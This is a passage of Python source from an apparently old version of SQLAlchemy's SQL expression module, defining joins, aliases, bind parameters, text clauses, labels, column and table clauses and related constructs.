"""return a join of this :class:`FromClause` against another :class:`FromClause`."""
return Join(self, right, onclause, isouter)
def outerjoin(self, right, onclause=None):
"""return an outer join of this :class:`FromClause` against another :class:`FromClause`."""
return Join(self, right, onclause, True)
def alias(self, name=None):
"""return an alias of this :class:`FromClause`.
For table objects, this has the effect of the table being rendered
as ``tablename AS aliasname`` in a SELECT statement.
For select objects, the effect is that of creating a named
subquery, i.e. ``(select ...) AS aliasname``.
The :func:`alias()` method is the general way to create
a "subquery" out of an existing SELECT.
The ``name`` parameter is optional, and if left blank an
"anonymous" name will be generated at compile time, guaranteed
to be unique against other anonymous constructs used in the
same statement.
"""
return Alias(self, name)
def is_derived_from(self, fromclause):
"""Return True if this FromClause is 'derived' from the given FromClause.
An example would be an Alias of a Table is derived from that Table.
"""
return fromclause in self._cloned_set
def replace_selectable(self, old, alias):
"""replace all occurences of FromClause 'old' with the given Alias
object, returning a copy of this :class:`FromClause`.
"""
global ClauseAdapter
if ClauseAdapter is None:
from sqlalchemy.sql.util import ClauseAdapter
return ClauseAdapter(alias).traverse(self)
def correspond_on_equivalents(self, column, equivalents):
"""Return corresponding_column for the given column, or if None
search for a match in the given dictionary.
"""
col = self.corresponding_column(column, require_embedded=True)
if col is None and col in equivalents:
for equiv in equivalents[col]:
nc = self.corresponding_column(equiv, require_embedded=True)
if nc:
return nc
return col
def corresponding_column(self, column, require_embedded=False):
"""Given a :class:`ColumnElement`, return the exported :class:`ColumnElement`
object from this :class:`Selectable` which corresponds to that
        original :class:`~sqlalchemy.schema.Column` via a common ancestor column.
:param column: the target :class:`ColumnElement` to be matched
:param require_embedded: only return corresponding columns for the given
:class:`ColumnElement`, if the given :class:`ColumnElement` is
actually present within a sub-element of this
:class:`FromClause`. Normally the column will match if it merely
        shares a common ancestor with one of the exported columns
of this :class:`FromClause`.
"""
        # don't dig around if the column is locally present
if self.c.contains_column(column):
return column
col, intersect = None, None
target_set = column.proxy_set
cols = self.c
for c in cols:
i = target_set.intersection(itertools.chain(*[p._cloned_set for p in c.proxy_set]))
if i and \
(not require_embedded or c.proxy_set.issuperset(target_set)):
if col is None:
# no corresponding column yet, pick this one.
col, intersect = c, i
elif len(i) > len(intersect):
# 'c' has a larger field of correspondence than 'col'.
# i.e. selectable.c.a1_x->a1.c.x->table.c.x matches
# a1.c.x->table.c.x better than
# selectable.c.x->table.c.x does.
col, intersect = c, i
elif i == intersect:
# they have the same field of correspondence.
# see which proxy_set has fewer columns in it, which indicates
# a closer relationship with the root column. Also take into
# account the "weight" attribute which CompoundSelect() uses to
# give higher precedence to columns based on vertical position
# in the compound statement, and discard columns that have no
# reference to the target column (also occurs with
# CompoundSelect)
col_distance = util.reduce(operator.add,
[sc._annotations.get('weight', 1)
for sc in col.proxy_set
if sc.shares_lineage(column)]
)
c_distance = util.reduce(operator.add,
[sc._annotations.get('weight', 1)
for sc in c.proxy_set
if sc.shares_lineage(column)]
)
if c_distance < col_distance:
col, intersect = c, i
return col
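    # Illustrative correspondence (comment-only; 'users' is a hypothetical
    # Table):
    #
    #     a = users.alias()
    #     a.corresponding_column(users.c.id) is a.c.id   # True: the alias
    #                                                    # column proxies it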
@property
def description(self):
"""a brief description of this FromClause.
Used primarily for error message formatting.
"""
return getattr(self, 'name', self.__class__.__name__ + " object")
def _reset_exported(self):
"""delete memoized collections when a FromClause is cloned."""
        for attr in ('_columns', '_primary_key', '_foreign_keys', 'locate_all_froms'):
self.__dict__.pop(attr, None)
@util.memoized_property
def _columns(self):
"""Return the collection of Column objects contained by this FromClause."""
self._export_columns()
return self._columns
@util.memoized_property
def _primary_key(self):
"""Return the collection of Column objects which comprise the primary key of this FromClause."""
self._export_columns()
return self._primary_key
@util.memoized_property
def _foreign_keys(self):
"""Return the collection of ForeignKey objects which this FromClause references."""
self._export_columns()
return self._foreign_keys
columns = property(attrgetter('_columns'), doc=_columns.__doc__)
primary_key = property(
attrgetter('_primary_key'),
doc=_primary_key.__doc__)
foreign_keys = property(
attrgetter('_foreign_keys'),
doc=_foreign_keys.__doc__)
# synonyms for 'columns'
c = _select_iterable = property(attrgetter('columns'), doc=_columns.__doc__)
def _export_columns(self):
"""Initialize column collections."""
self._columns = ColumnCollection()
self._primary_key = ColumnSet()
self._foreign_keys = set()
self._populate_column_collection()
def _populate_column_collection(self):
pass
class _BindParamClause(ColumnElement):
"""Represent a bind parameter.
Public constructor is the :func:`bindparam()` function.
"""
__visit_name__ = 'bindparam'
quote = None
def __init__(self, key, value, type_=None, unique=False,
isoutparam=False, required=False,
_fallback_type=None):
"""Construct a _BindParamClause.
key
the key for this bind param. Will be used in the generated
SQL statement for dialects that use named parameters. This
value may be modified when part of a compilation operation,
if other :class:`_BindParamClause` objects exist with the same
key, or if its length is too long and truncation is
required.
value
Initial value for this bind param. This value may be
overridden by the dictionary of parameters sent to statement
compilation/execution.
type\_
A ``TypeEngine`` object that will be used to pre-process the
value corresponding to this :class:`_BindParamClause` at
execution time.
unique
if True, the key name of this BindParamClause will be
modified if another :class:`_BindParamClause` of the same name
already has been located within the containing
:class:`ClauseElement`.
required
a value is required at execution time.
isoutparam
if True, the parameter should be treated like a stored procedure "OUT"
parameter.
"""
if unique:
self.key = _generated_label("%%(%d %s)s" % (id(self), key or 'param'))
else:
self.key = key or _generated_label("%%(%d param)s" % id(self))
self._orig_key = key or 'param'
self.unique = unique
self.value = value
self.isoutparam = isoutparam
self.required = required
if type_ is None:
self.type = sqltypes.type_map.get(type(value), _fallback_type or sqltypes.NULLTYPE)
if _fallback_type and _fallback_type._type_affinity == self.type._type_affinity:
self.type = _fallback_type
elif isinstance(type_, type):
self.type = type_()
else:
self.type = type_
def _clone(self):
c = ClauseElement._clone(self)
if self.unique:
c.key = _generated_label("%%(%d %s)s" % (id(c), c._orig_key or 'param'))
return c
def _convert_to_unique(self):
if not self.unique:
self.unique = True
self.key = _generated_label("%%(%d %s)s" % (id(self), self._orig_key or 'param'))
def bind_processor(self, dialect):
return self.type.dialect_impl(dialect).bind_processor(dialect)
def compare(self, other, **kw):
"""Compare this :class:`_BindParamClause` to the given clause."""
return isinstance(other, _BindParamClause) and \
self.type._compare_type_affinity(other.type) and \
self.value == other.value
def __getstate__(self):
"""execute a deferred value for serialization purposes."""
d = self.__dict__.copy()
v = self.value
if util.callable(v):
v = v()
d['value'] = v
return d
def __repr__(self):
return "_BindParamClause(%r, %r, type_=%r)" % (
self.key, self.value, self.type
)
class _TypeClause(ClauseElement):
"""Handle a type keyword in a SQL statement.
Used by the ``Case`` statement.
"""
__visit_name__ = 'typeclause'
def __init__(self, type):
self.type = type
class _Generative(object):
"""Allow a ClauseElement to generate itself via the
@_generative decorator.
"""
def _generate(self):
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
return s
class Executable(_Generative):
"""Mark a ClauseElement as supporting execution."""
supports_execution = True
_execution_options = util.frozendict()
@_generative
def execution_options(self, **kw):
""" Set non-SQL options for the statement which take effect during execution.
Current options include:
* autocommit - when True, a COMMIT will be invoked after execution
when executed in 'autocommit' mode, i.e. when an explicit transaction
is not begun on the connection. Note that DBAPI connections by
default are always in a transaction - SQLAlchemy uses rules applied
to different kinds of statements to determine if COMMIT will be invoked
in order to provide its "autocommit" feature. Typically, all
INSERT/UPDATE/DELETE statements as well as CREATE/DROP statements
have autocommit behavior enabled; SELECT constructs do not. Use this
          option when invoking a SELECT or other specific SQL construct
where COMMIT is desired (typically when calling stored procedures
and such).
* stream_results - indicate to the dialect that results should be
"streamed" and not pre-buffered, if possible. This is a limitation
of many DBAPIs. The flag is currently understood only by the
psycopg2 dialect.
"""
self._execution_options = self._execution_options.union(kw)
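    # Typical usage sketch (comment-only):
    #
    #     stmt = select([table]).execution_options(autocommit=True,
    #                                              stream_results=True)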
# legacy, some outside users may be calling this
_Executable = Executable
class _TextClause(Executable, ClauseElement):
"""Represent a literal SQL text fragment.
Public constructor is the :func:`text()` function.
"""
__visit_name__ = 'textclause'
_bind_params_regex = re.compile(r'(?<![:\w\x5c]):(\w+)(?!:)', re.UNICODE)
_execution_options = Executable._execution_options.union({'autocommit':PARSE_AUTOCOMMIT})
@property
def _select_iterable(self):
return (self,)
_hide_froms = []
def __init__(self, text = "", bind=None,
bindparams=None, typemap=None,
autocommit=None):
self._bind = bind
self.bindparams = {}
self.typemap = typemap
if autocommit is not None:
util.warn_deprecated("autocommit on text() is deprecated. "
"Use .execution_options(autocommit=True)")
self._execution_options = self._execution_options.union({'autocommit':autocommit})
if typemap is not None:
for key in typemap.keys():
typemap[key] = sqltypes.to_instance(typemap[key])
def repl(m):
self.bindparams[m.group(1)] = bindparam(m.group(1))
return ":%s" % m.group(1)
# scan the string and search for bind parameter names, add them
# to the list of bindparams
self.text = self._bind_params_regex.sub(repl, text)
if bindparams is not None:
for b in bindparams:
self.bindparams[b.key] = b
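    # Illustrative: for text("SELECT * FROM t WHERE id=:id"), the regex
    # scan above finds ':id', leaving self.bindparams == {'id':
    # bindparam('id')}. The lookbehind/lookahead skip '::' casts and
    # backslash-escaped colons.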
@property
def type(self):
if self.typemap is not None and len(self.typemap) == 1:
return list(self.typemap)[0]
else:
return None
def _copy_internals(self, clone=_clone):
self.bindparams = dict((b.key, clone(b))
for b in self.bindparams.values())
def get_children(self, **kwargs):
return self.bindparams.values()
class _Null(ColumnElement):
"""Represent the NULL keyword in a SQL statement.
Public constructor is the :func:`null()` function.
"""
__visit_name__ = 'null'
def __init__(self):
self.type = sqltypes.NULLTYPE
class ClauseList(ClauseElement):
"""Describe a list of clauses, separated by an operator.
By default, is comma-separated, such as a column listing.
"""
__visit_name__ = 'clauselist'
def __init__(self, *clauses, **kwargs):
self.operator = kwargs.pop('operator', operators.comma_op)
self.group = kwargs.pop('group', True)
self.group_contents = kwargs.pop('group_contents', True)
if self.group_contents:
self.clauses = [
_literal_as_text(clause).self_group(against=self.operator)
for clause in clauses if clause is not None]
else:
self.clauses = [
_literal_as_text(clause)
for clause in clauses if clause is not None]
@util.memoized_property
def type(self):
if self.clauses:
return self.clauses[0].type
else:
return sqltypes.NULLTYPE
def __iter__(self):
return iter(self.clauses)
def __len__(self):
return len(self.clauses)
@property
def _select_iterable(self):
return iter(self)
def append(self, clause):
# TODO: not sure if i like the 'group_contents' flag. need to
# define the difference between a ClauseList of ClauseLists,
# and a "flattened" ClauseList of ClauseLists. flatten()
# method ?
if self.group_contents:
self.clauses.append(_literal_as_text(clause).self_group(against=self.operator))
else:
self.clauses.append(_literal_as_text(clause))
def _copy_internals(self, clone=_clone):
self.clauses = [clone(clause) for clause in self.clauses]
def get_children(self, **kwargs):
return self.clauses
@property
def _from_objects(self):
return list(itertools.chain(*[c._from_objects for c in self.clauses]))
def self_group(self, against=None):
if self.group and self.operator is not against and \
operators.is_precedent(self.operator, against):
return _Grouping(self)
else:
return self
def compare(self, other, **kw):
"""Compare this :class:`ClauseList` to the given :class:`ClauseList`,
including a comparison of all the clause items.
"""
if not isinstance(other, ClauseList) and len(self.clauses) == 1:
return self.clauses[0].compare(other, **kw)
elif isinstance(other, ClauseList) and len(self.clauses) == len(other.clauses):
for i in range(0, len(self.clauses)):
if not self.clauses[i].compare(other.clauses[i], **kw):
return False
else:
return self.operator == other.operator
else:
return False
class BooleanClauseList(ClauseList, ColumnElement):
__visit_name__ = 'clauselist'
def __init__(self, *clauses, **kwargs):
super(BooleanClauseList, self).__init__(*clauses, **kwargs)
self.type = sqltypes.to_instance(kwargs.get('type_', sqltypes.Boolean))
@property
def _select_iterable(self):
return (self, )
class _Tuple(ClauseList, ColumnElement):
def __init__(self, *clauses, **kw):
clauses = [_literal_as_binds(c) for c in clauses]
super(_Tuple, self).__init__(*clauses, **kw)
self.type = _type_from_args(clauses)
@property
def _select_iterable(self):
return (self, )
def _bind_param(self, obj):
return _Tuple(*[
_BindParamClause(None, o, _fallback_type=self.type, unique=True)
for o in obj
]).self_group()
class _Case(ColumnElement):
__visit_name__ = 'case'
def __init__(self, whens, value=None, else_=None):
try:
whens = util.dictlike_iteritems(whens)
except TypeError:
pass
if value is not None:
whenlist = [
(_literal_as_binds(c).self_group(), _literal_as_binds(r)) for (c, r) in whens
]
else:
whenlist = [
(_no_literals(c).self_group(), _literal_as_binds(r)) for (c, r) in whens
]
if whenlist:
type_ = list(whenlist[-1])[-1].type
else:
type_ = None
if value is None:
self.value = None
else:
self.value = _literal_as_binds(value)
self.type = type_
self.whens = whenlist
if else_ is not None:
self.else_ = _literal_as_binds(else_)
else:
self.else_ = None
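    # Illustrative construction via the case() function (comment-only;
    # 'users' is a hypothetical Table). The "shorthand" form compares
    # 'value' against each condition:
    #
    #     case({'wendy': 'W', 'jack': 'J'}, value=users.c.name, else_='E')
    #
    # while the plain form takes full boolean expressions:
    #
    #     case([(users.c.name == 'wendy', 'W')], else_='E')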
def _copy_internals(self, clone=_clone):
if self.value is not None:
self.value = clone(self.value)
self.whens = [(clone(x), clone(y)) for x, y in self.whens]
if self.else_ is not None:
self.else_ = clone(self.else_)
def get_children(self, **kwargs):
if self.value is not None:
yield self.value
for x, y in self.whens:
yield x
yield y
if self.else_ is not None:
yield self.else_
@property
def _from_objects(self):
return list(itertools.chain(*[x._from_objects for x in self.get_children()]))
class FunctionElement(Executable, ColumnElement, FromClause):
"""Base for SQL function-oriented constructs."""
def __init__(self, *clauses, **kwargs):
args = [_literal_as_binds(c, self.name) for c in clauses]
self.clause_expr = ClauseList(
operator=operators.comma_op,
group_contents=True, *args).\
self_group()
@property
def columns(self):
return [self]
@util.memoized_property
def clauses(self):
return self.clause_expr.element
@property
def _from_objects(self):
return self.clauses._from_objects
def get_children(self, **kwargs):
return self.clause_expr,
def _copy_internals(self, clone=_clone):
self.clause_expr = clone(self.clause_expr)
self._reset_exported()
util.reset_memoized(self, 'clauses')
def select(self):
s = select([self])
if self._execution_options:
s = s.execution_options(**self._execution_options)
return s
def scalar(self):
return self.select().execute().scalar()
def execute(self):
return self.select().execute()
def _bind_param(self, obj):
return _BindParamClause(None, obj, _fallback_type=self.type, unique=True)
class Function(FunctionElement):
"""Describe a named SQL function."""
__visit_name__ = 'function'
def __init__(self, name, *clauses, **kw):
self.packagenames = kw.pop('packagenames', None) or []
self.name = name
self._bind = kw.get('bind', None)
self.type = sqltypes.to_instance(kw.get('type_', None))
FunctionElement.__init__(self, *clauses, **kw)
def _bind_param(self, obj):
return _BindParamClause(self.name, obj, _fallback_type=self.type, unique=True)
class _Cast(ColumnElement):
__visit_name__ = 'cast'
def __init__(self, clause, totype, **kwargs):
self.type = sqltypes.to_instance(totype)
self.clause = _literal_as_binds(clause, None)
self.typeclause = _TypeClause(self.type)
def _copy_internals(self, clone=_clone):
self.clause = clone(self.clause)
self.typeclause = clone(self.typeclause)
def get_children(self, **kwargs):
return self.clause, self.typeclause
@property
def _from_objects(self):
return self.clause._from_objects
class _Extract(ColumnElement):
__visit_name__ = 'extract'
def __init__(self, field, expr, **kwargs):
self.type = sqltypes.Integer()
self.field = field
self.expr = _literal_as_binds(expr, None)
def _copy_internals(self, clone=_clone):
self.expr = clone(self.expr)
def get_children(self, **kwargs):
return self.expr,
@property
def _from_objects(self):
return self.expr._from_objects
class _UnaryExpression(ColumnElement):
__visit_name__ = 'unary'
def __init__(self, element, operator=None, modifier=None, type_=None, negate=None):
self.operator = operator
self.modifier = modifier
self.element = _literal_as_text(element).self_group(against=self.operator or self.modifier)
self.type = sqltypes.to_instance(type_)
self.negate = negate
@property
def _from_objects(self):
return self.element._from_objects
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
def get_children(self, **kwargs):
return self.element,
def compare(self, other, **kw):
"""Compare this :class:`_UnaryExpression` against the given :class:`ClauseElement`."""
return (
isinstance(other, _UnaryExpression) and
self.operator == other.operator and
self.modifier == other.modifier and
self.element.compare(other.element, **kw)
)
def _negate(self):
if self.negate is not None:
return _UnaryExpression(
self.element,
operator=self.negate,
negate=self.operator,
modifier=self.modifier,
type_=self.type)
else:
return super(_UnaryExpression, self)._negate()
def self_group(self, against=None):
if self.operator and operators.is_precedent(self.operator, against):
return _Grouping(self)
else:
return self
class _BinaryExpression(ColumnElement):
"""Represent an expression that is ``LEFT <operator> RIGHT``."""
__visit_name__ = 'binary'
def __init__(self, left, right, operator, type_=None, negate=None, modifiers=None):
self.left = _literal_as_text(left).self_group(against=operator)
self.right = _literal_as_text(right).self_group(against=operator)
self.operator = operator
self.type = sqltypes.to_instance(type_)
self.negate = negate
if modifiers is None:
self.modifiers = {}
else:
self.modifiers = modifiers
def __nonzero__(self):
try:
return self.operator(hash(self.left), hash(self.right))
except:
raise TypeError("Boolean value of this clause is not defined")
@property
def _from_objects(self):
return self.left._from_objects + self.right._from_objects
def _copy_internals(self, clone=_clone):
self.left = clone(self.left)
self.right = clone(self.right)
def get_children(self, **kwargs):
return self.left, self.right
def compare(self, other, **kw):
"""Compare this :class:`_BinaryExpression` against the given :class:`_BinaryExpression`."""
return (
isinstance(other, _BinaryExpression) and
self.operator == other.operator and
(
self.left.compare(other.left, **kw) and
self.right.compare(other.right, **kw) or
(
operators.is_commutative(self.operator) and
self.left.compare(other.right, **kw) and
self.right.compare(other.left, **kw)
)
)
)
def self_group(self, against=None):
# use small/large defaults for comparison so that unknown
# operators are always parenthesized
if self.operator is not against and operators.is_precedent(self.operator, against):
return _Grouping(self)
else:
return self
def _negate(self):
if self.negate is not None:
return _BinaryExpression(
self.left,
self.right,
self.negate,
negate=self.operator,
type_=sqltypes.BOOLEANTYPE,
modifiers=self.modifiers)
else:
return super(_BinaryExpression, self)._negate()
class _Exists(_UnaryExpression):
__visit_name__ = _UnaryExpression.__visit_name__
_from_objects = []
def __init__(self, *args, **kwargs):
if args and isinstance(args[0], (_SelectBaseMixin, _ScalarSelect)):
s = args[0]
else:
if not args:
args = ([literal_column('*')],)
s = select(*args, **kwargs).as_scalar().self_group()
_UnaryExpression.__init__(self, s, operator=operators.exists, type_=sqltypes.Boolean)
def select(self, whereclause=None, **params):
return select([self], whereclause, **params)
def correlate(self, fromclause):
e = self._clone()
e.element = self.element.correlate(fromclause).self_group()
return e
def select_from(self, clause):
"""return a new exists() construct with the given expression set as its FROM
clause.
"""
e = self._clone()
e.element = self.element.select_from(clause).self_group()
return e
def where(self, clause):
"""return a new exists() construct with the given expression added to its WHERE
clause, joined to the existing clause via AND, if any.
"""
e = self._clone()
e.element = self.element.where(clause).self_group()
return e
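    # Generative usage sketch (comment-only; 'users'/'addresses' are
    # hypothetical Tables):
    #
    #     exists().where(addresses.c.user_id == users.c.id).correlate(users)
    #
    # Each of where()/select_from()/correlate() returns a new _Exists
    # wrapping a modified copy of the embedded SELECT.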
class Join(FromClause):
"""represent a ``JOIN`` construct between two :class:`FromClause` elements.
The public constructor function for :class:`Join` is the module-level
:func:`join()` function, as well as the :func:`join()` method available
off all :class:`FromClause` subclasses.
"""
__visit_name__ = 'join'
def __init__(self, left, right, onclause=None, isouter=False):
self.left = _literal_as_text(left)
self.right = _literal_as_text(right).self_group()
if onclause is None:
self.onclause = self._match_primaries(self.left, self.right)
else:
self.onclause = onclause
self.isouter = isouter
self.__folded_equivalents = None
@property
def description(self):
return "Join object on %s(%d) and %s(%d)" % (
self.left.description,
id(self.left),
self.right.description,
id(self.right))
def is_derived_from(self, fromclause):
return fromclause is self or \
self.left.is_derived_from(fromclause) or\
self.right.is_derived_from(fromclause)
def self_group(self, against=None):
return _FromGrouping(self)
def _populate_column_collection(self):
columns = [c for c in self.left.columns] + [c for c in self.right.columns]
global sql_util
if not sql_util:
from sqlalchemy.sql import util as sql_util
self._primary_key.extend(sql_util.reduce_columns(
(c for c in columns if c.primary_key), self.onclause))
self._columns.update((col._label, col) for col in columns)
self._foreign_keys.update(itertools.chain(*[col.foreign_keys for col in columns]))
def _copy_internals(self, clone=_clone):
self._reset_exported()
self.left = clone(self.left)
self.right = clone(self.right)
self.onclause = clone(self.onclause)
self.__folded_equivalents = None
def get_children(self, **kwargs):
return self.left, self.right, self.onclause
def _match_primaries(self, primary, secondary):
global sql_util
if not sql_util:
from sqlalchemy.sql import util as sql_util
return sql_util.join_condition(primary, secondary)
def select(self, whereclause=None, fold_equivalents=False, **kwargs):
"""Create a :class:`Select` from this :class:`Join`.
:param whereclause: the WHERE criterion that will be sent to
the :func:`select()` function
:param fold_equivalents: based on the join criterion of this
:class:`Join`, do not include
repeat column names in the column list of the resulting
select, for columns that are calculated to be "equivalent"
based on the join criterion of this :class:`Join`. This will
recursively apply to any joins directly nested by this one
as well. This flag is specific to a particular use case
by the ORM and is deprecated as of 0.6.
:param \**kwargs: all other kwargs are sent to the
underlying :func:`select()` function.
"""
if fold_equivalents:
global sql_util
if not sql_util:
from sqlalchemy.sql import util as sql_util
util.warn_deprecated("fold_equivalents is deprecated.")
collist = sql_util.folded_equivalents(self)
else:
collist = [self.left, self.right]
return select(collist, whereclause, from_obj=[self], **kwargs)
@property
def bind(self):
return self.left.bind or self.right.bind
def alias(self, name=None):
"""Create a :class:`Select` out of this :class:`Join` clause and return an :class:`Alias` of it.
The :class:`Select` is not correlating.
"""
return self.select(use_labels=True, correlate=False).alias(name)
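    # Illustrative chain (comment-only): aliasing a join wraps it as a
    # labeled, non-correlating subquery, roughly:
    #
    #     users.join(addresses).alias('ua')
    #     # -> (SELECT users.id AS users_id, ... FROM users
    #     #     JOIN addresses ON users.id = addresses.user_id) AS ua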
@property
def _hide_froms(self):
return itertools.chain(*[_from_objects(x.left, x.right) for x in self._cloned_set])
@property
def _from_objects(self):
return [self] + \
self.onclause._from_objects + \
self.left._from_objects + \
self.right._from_objects
class Alias(FromClause):
"""Represents an table or selectable alias (AS).
Represents an alias, as typically applied to any table or
sub-select within a SQL statement using the ``AS`` keyword (or
without the keyword on certain databases such as Oracle).
This object is constructed from the :func:`alias()` module level
function as well as the :func:`alias()` method available on all
:class:`FromClause` subclasses.
"""
__visit_name__ = 'alias'
named_with_column = True
def __init__(self, selectable, alias=None):
baseselectable = selectable
while isinstance(baseselectable, Alias):
baseselectable = baseselectable.element
self.original = baseselectable
self.supports_execution = baseselectable.supports_execution
if self.supports_execution:
self._execution_options = baseselectable._execution_options
self.element = selectable
if alias is None:
if self.original.named_with_column:
alias = getattr(self.original, 'name', None)
alias = _generated_label('%%(%d %s)s' % (id(self), alias or 'anon'))
self.name = alias
@property
def description(self):
# Py3K
#return self.name
# Py2K
return self.name.encode('ascii', 'backslashreplace')
# end Py2K
def as_scalar(self):
try:
return self.element.as_scalar()
except AttributeError:
raise AttributeError("Element %s does not support 'as_scalar()'" % self.element)
def is_derived_from(self, fromclause):
if fromclause in self._cloned_set:
return True
return self.element.is_derived_from(fromclause)
def _populate_column_collection(self):
for col in self.element.columns:
col._make_proxy(self)
def _copy_internals(self, clone=_clone):
self._reset_exported()
self.element = _clone(self.element)
baseselectable = self.element
while isinstance(baseselectable, Alias):
baseselectable = baseselectable.element
self.original = baseselectable
def get_children(self, column_collections=True, aliased_selectables=True, **kwargs):
if column_collections:
for c in self.c:
yield c
if aliased_selectables:
yield self.element
@property
def _from_objects(self):
return [self]
@property
def bind(self):
return self.element.bind
class _Grouping(ColumnElement):
"""Represent a grouping within a column expression"""
__visit_name__ = 'grouping'
def __init__(self, element):
self.element = element
self.type = getattr(element, 'type', None)
@property
def _label(self):
return getattr(self.element, '_label', None) or self.anon_label
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
def get_children(self, **kwargs):
return self.element,
@property
def _from_objects(self):
return self.element._from_objects
def __getattr__(self, attr):
return getattr(self.element, attr)
def __getstate__(self):
return {'element':self.element, 'type':self.type}
def __setstate__(self, state):
self.element = state['element']
self.type = state['type']
class _FromGrouping(FromClause):
"""Represent a grouping of a FROM clause"""
__visit_name__ = 'grouping'
def __init__(self, element):
self.element = element
@property
def columns(self):
return self.element.columns
@property
def _hide_froms(self):
return self.element._hide_froms
def get_children(self, **kwargs):
return self.element,
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
@property
def _from_objects(self):
return self.element._from_objects
def __getattr__(self, attr):
return getattr(self.element, attr)
def __getstate__(self):
return {'element':self.element}
def __setstate__(self, state):
self.element = state['element']
class _Label(ColumnElement):
"""Represents a column label (AS).
Represent a label, as typically applied to any column-level
element using the ``AS`` sql keyword.
This object is constructed from the :func:`label()` module level
function as well as the :func:`label()` method available on all
:class:`ColumnElement` subclasses.
"""
__visit_name__ = 'label'
def __init__(self, name, element, type_=None):
while isinstance(element, _Label):
element = element.element
self.name = self.key = self._label = name or \
_generated_label("%%(%d %s)s" % (
id(self), getattr(element, 'name', 'anon'))
)
self._element = element
self._type = type_
self.quote = element.quote
@util.memoized_property
def type(self):
return sqltypes.to_instance(
self._type or getattr(self._element, 'type', None)
)
@util.memoized_property
def element(self):
return self._element.self_group(against=operators.as_)
def _proxy_attr(name):
get = attrgetter(name)
def attr(self):
return get(self.element)
return property(attr)
proxies = _proxy_attr('proxies')
base_columns = _proxy_attr('base_columns')
proxy_set = _proxy_attr('proxy_set')
primary_key = _proxy_attr('primary_key')
foreign_keys = _proxy_attr('foreign_keys')
def get_children(self, **kwargs):
return self.element,
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
@property
def _from_objects(self):
return self.element._from_objects
def _make_proxy(self, selectable, name = None):
if isinstance(self.element, (Selectable, ColumnElement)):
e = self.element._make_proxy(selectable, name=self.name)
else:
e = column(self.name)._make_proxy(selectable=selectable)
e.proxies.append(self)
return e
class ColumnClause(_Immutable, ColumnElement):
"""Represents a generic column expression from any textual string.
This includes columns associated with tables, aliases and select
statements, but also any arbitrary text. May or may not be bound
to an underlying :class:`Selectable`. :class:`ColumnClause` is usually
    created publicly via the :func:`column()` function or the
:func:`literal_column()` function.
text
the text of the element.
selectable
parent selectable.
type
``TypeEngine`` object which can associate this :class:`ColumnClause`
with a type.
is_literal
if True, the :class:`ColumnClause` is assumed to be an exact
expression that will be delivered to the output with no quoting
      rules applied regardless of case-sensitivity settings. The
:func:`literal_column()` function is usually used to create such a
:class:`ColumnClause`.
"""
__visit_name__ = 'column'
onupdate = default = server_default = server_onupdate = None
def __init__(self, text, selectable=None, type_=None, is_literal=False):
self.key = self.name = text
self.table = selectable
self.type = sqltypes.to_instance(type_)
self.is_literal = is_literal
@util.memoized_property
def description(self):
# Py3K
#return self.name
# Py2K
return self.name.encode('ascii', 'backslashreplace')
# end Py2K
@util.memoized_property
def _label(self):
if self.is_literal:
return None
elif self.table is not None and self.table.named_with_column:
if getattr(self.table, 'schema', None):
label = self.table.schema.replace('.', '_') + "_" + \
_escape_for_generated(self.table.name) + "_" + \
_escape_for_generated(self.name)
else:
label = _escape_for_generated(self.table.name) + "_" + \
_escape_for_generated(self.name)
return _generated_label(label)
else:
return self.name
def label(self, name):
if name is None:
return self
else:
return super(ColumnClause, self).label(name)
@property
def _from_objects(self):
if self.table is not None:
return [self.table]
else:
return []
def _bind_param(self, obj):
return _BindParamClause(self.name, obj, _fallback_type=self.type, unique=True)
def _make_proxy(self, selectable, name=None, attach=True):
# propagate the "is_literal" flag only if we are keeping our name,
        # otherwise it's considered to be a label
is_literal = self.is_literal and (name is None or name == self.name)
c = ColumnClause(
name or self.name,
selectable=selectable,
type_=self.type,
is_literal=is_literal
)
c.proxies = [self]
if attach:
selectable.columns[c.name] = c
return c
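# A brief usage sketch of the two constructors named in the ColumnClause
# docstring above (illustrative only); column() yields a name-based expression
# subject to quoting rules, while literal_column() is emitted exactly as written:
#
#     col = column('user_name')           # quoted per identifier rules
#     lit = literal_column("count(*)")    # rendered verbatim in the output SQL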
class TableClause(_Immutable, FromClause):
"""Represents a "table" construct.
Note that this represents tables only as another syntactical
construct within SQL expressions; it does not provide schema-level
functionality.
"""
__visit_name__ = 'table'
named_with_column = True
def __init__(self, name, *columns):
super(TableClause, self).__init__()
self.name = self.fullname = name
self._columns = ColumnCollection()
self._primary_key = ColumnSet()
self._foreign_keys = set()
for c in columns:
self.append_column(c)
def _export_columns(self):
raise NotImplementedError()
@util.memoized_property
def description(self):
# Py3K
#return self.name
# Py2K
return self.name.encode('ascii', 'backslashreplace')
# end Py2K
def append_column(self, c):
self._columns[c.name] = c
c.table = self
def get_children(self, column_collections=True, **kwargs):
if column_collections:
return [c for c in self.c]
else:
return []
def count(self, whereclause=None, **params):
"""return a SELECT COUNT generated against this :class:`TableClause`."""
if self.primary_key:
col = list(self.primary_key)[0]
else:
col = list(self.columns)[0]
return select(
[func.count(col).label('tbl_row_count')],
whereclause,
from_obj=[self],
**params)
def insert(self, values=None, inline=False, **kwargs):
"""Generate an :func:`insert()` construct."""
return insert(self, values=values, inline=inline, **kwargs)
def update(self, whereclause=None, values=None, inline=False, **kwargs):
"""Generate an :func:`update()` construct."""
return update(self, whereclause=whereclause,
values=values, inline=inline, **kwargs)
def delete(self, whereclause=None, **kwargs):
"""Generate a :func:`delete()` construct."""
return delete(self, whereclause, **kwargs)
@property
def _from_objects(self):
return [self]
class _SelectBaseMixin(Executable):
"""Base class for :class:`Select` and ``CompoundSelects``."""
def __init__(self,
use_labels=False,
for_update=False,
limit=None,
offset=None,
order_by=None,
group_by=None,
bind=None,
autocommit=None):
self.use_labels = use_labels
self.for_update = for_update
if autocommit is not None:
util.warn_deprecated("autocommit on select() is deprecated. "
"Use .execution_options(autocommit=True)")
self._execution_options = self._execution_options.union({'autocommit':autocommit})
self._limit = limit
self._offset = offset
self._bind = bind
self._order_by_clause = ClauseList(*util.to_list(order_by) or [])
self._group_by_clause = ClauseList(*util.to_list(group_by) or [])
def as_scalar(self):
"""return a 'scalar' representation of this selectable, which can be
used as a column expression.
Typically, a select statement which has only one column in its columns
clause is eligible to be used as a scalar expression.
The returned object is an instance of
:class:`_ScalarSelect`.
"""
return _ScalarSelect(self)
